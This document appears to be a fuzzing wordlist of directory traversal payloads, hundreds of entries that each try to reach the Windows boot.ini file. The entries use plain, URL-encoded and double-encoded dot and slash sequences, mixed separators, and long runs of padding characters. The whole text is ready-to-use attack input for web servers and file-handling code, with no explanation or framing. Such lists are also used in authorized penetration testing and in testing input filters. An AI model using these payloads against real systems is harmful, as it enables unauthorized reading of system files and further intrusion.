-%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -..\boot.ini -..\..\boot.ini -..\..\..\boot.ini -..\..\..\..\boot.ini -..\..\..\..\..\boot.ini -..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\boot.ini -..%5cboot.ini -..%5c..%5cboot.ini -..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -%2e%2e\boot.ini -%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -..%255cboot.ini -..%255c..%255cboot.ini -..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -%252e%252e\boot.ini -%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -../boot.ini -../../boot.ini -../../../boot.ini -../../../../boot.ini -../../../../../boot.ini -../../../../../../boot.ini -../../../../../../../boot.ini -../../../../../../../../boot.ini -..%2fboot.ini -..%2f..%2fboot.ini -..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -%2e%2e/boot.ini -%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -..%252fboot.ini -..%252f..%252fboot.ini -..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -%252e%252e/boot.ini -%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -..\boot.ini -..\..\boot.ini -..\..\..\boot.ini -..\..\..\..\boot.ini -..\..\..\..\..\boot.ini -..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\boot.ini -..%5cboot.ini -..%5c..%5cboot.ini -..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -%2e%2e\boot.ini -%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -..%255cboot.ini -..%255c..%255cboot.ini -..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -%252e%252e\boot.ini -%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -\../boot.ini -\../\../boot.ini -\../\../\../boot.ini -\../\../\../\../boot.ini -\../\../\../\../\../boot.ini -\../\../\../\../\../\../boot.ini -\../\../\../\../\../\../\../boot.ini -\../\../\../\../\../\../\../\../boot.ini -/..\boot.ini -/..\/..\boot.ini -/..\/..\/..\boot.ini -/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\/..\/..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA